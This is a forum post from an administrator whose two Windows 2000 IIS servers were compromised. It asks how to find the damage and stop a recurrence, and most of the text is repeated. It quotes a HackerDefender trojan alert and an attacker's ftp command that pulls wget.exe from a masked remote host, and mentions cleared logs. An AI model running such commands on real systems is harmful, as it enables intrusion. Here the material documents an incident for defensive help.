G
Guest
I have 2 Windows 2000 Server Machines running IIS, which have been
compromised. I am trying to determine to what extent and more importantly
prevent this form reoccuring.
I first noticed an issue because I received a virus alert from my Virus
scanning software on the servers indicating the following:
The file C:\WINNT\system32\full.exe\000ae8a4.EXE is infected with
HackerDefender.sys Trojan. The file was successfully deleted. user NT
AUTHORITY\SYSTEM
When I check the Server monitors, I found a command prompt open on the
screen, with the following:
C:\WINNT\system32>ftp -v -A -s:ftp.scr xxx.xxx.xxx.xxx
Anonymous login secceeded for (e-mail address removed)
ftp>get wget.exe
ftp>
(Note: I have replaced the hacker's IP in the message above with x's)
I checked the security log and found that the intruder has cleared the
entries from that day. I have deleted ftp.scr from the server.
How can I prevent this form reoccuring? How I can determine what, if any,
damage has been done?
compromised. I am trying to determine to what extent and more importantly
prevent this form reoccuring.
I first noticed an issue because I received a virus alert from my Virus
scanning software on the servers indicating the following:
The file C:\WINNT\system32\full.exe\000ae8a4.EXE is infected with
HackerDefender.sys Trojan. The file was successfully deleted. user NT
AUTHORITY\SYSTEM
When I check the Server monitors, I found a command prompt open on the
screen, with the following:
C:\WINNT\system32>ftp -v -A -s:ftp.scr xxx.xxx.xxx.xxx
Anonymous login secceeded for (e-mail address removed)
ftp>get wget.exe
ftp>
(Note: I have replaced the hacker's IP in the message above with x's)
I checked the security log and found that the intruder has cleared the
entries from that day. I have deleted ftp.scr from the server.
How can I prevent this form reoccuring? How I can determine what, if any,
damage has been done?